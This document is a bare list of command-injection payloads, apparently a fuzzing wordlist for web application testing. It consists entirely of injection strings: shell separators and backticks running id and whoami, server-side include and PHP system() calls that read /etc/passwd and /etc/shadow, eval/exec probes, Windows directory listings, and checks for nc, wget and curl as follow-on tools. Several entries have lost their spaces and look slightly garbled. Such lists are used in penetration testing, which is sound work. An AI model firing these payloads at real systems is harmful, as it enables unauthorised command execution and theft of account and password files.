;id
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
;id;
;id
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
|id
&id
;id
%0aid%0a
`id`
$;/usr/bin/id
$(`cat/etc/passwd`)
cat/etc/passwd
%0Acat%20/etc/passwd
{{get_user_file("/etc/passwd")}}
<!--#execcmd="/bin/cat/etc/passwd"-->
<!--#execcmd="/bin/cat/etc/shadow"-->
<!--#execcmd="/usr/bin/id;-->
system('cat/etc/passwd');
<?phpsystem("cat/etc/passwd");?>
%0Aid
%0aid%0a
%0Aid%0A
%0A/usr/bin/id
%0A/usr/bin/id%0A
a|id|
a;id|
a;id;
a;id\n
dir
|dir
;dir
$(`dir`)
&dir
&&dir
&&dir
|dirC:\
;dirC:\
&dirC:\
&&dirC:\
dirC:\
|dirC:\DocumentsandSettings\*
;dirC:\DocumentsandSettings\*
&dirC:\DocumentsandSettings\*
&&dirC:\DocumentsandSettings\*
dirC:\DocumentsandSettings\*
|dirC:\Users
;dirC:\Users
&dirC:\Users
&&dirC:\Users
dirC:\Users
eval('pwd')
eval('pwd');
eval('sleep5')
eval('sleep5');
eval('whoami')
eval('whoami');
exec('pwd')
exec('pwd');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
|id
;id
;id|
;id;
&id
&&id
;id\n
/index.html|id|
\n/usr/bin/id\n
\nid|
\nid;
\nid\n
pwd
|pwd
;pwd
&pwd
&&pwd
system('pwd')
system('pwd');
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
hichcurl
whichgcc
whichnc
whichnetcat
whichperl
whichpython
whichwget
whoami
|whoami
;whoami
'whoami
'||whoami
'&whoami
'&&whoami
';whoami
"whoami
"||whoami
"|whoami
"&whoami
"&&whoami
";whoami
$(`whoami`)
&whoami
&&whoami
id
whoami
/etc/passwd
cat/etc/passwd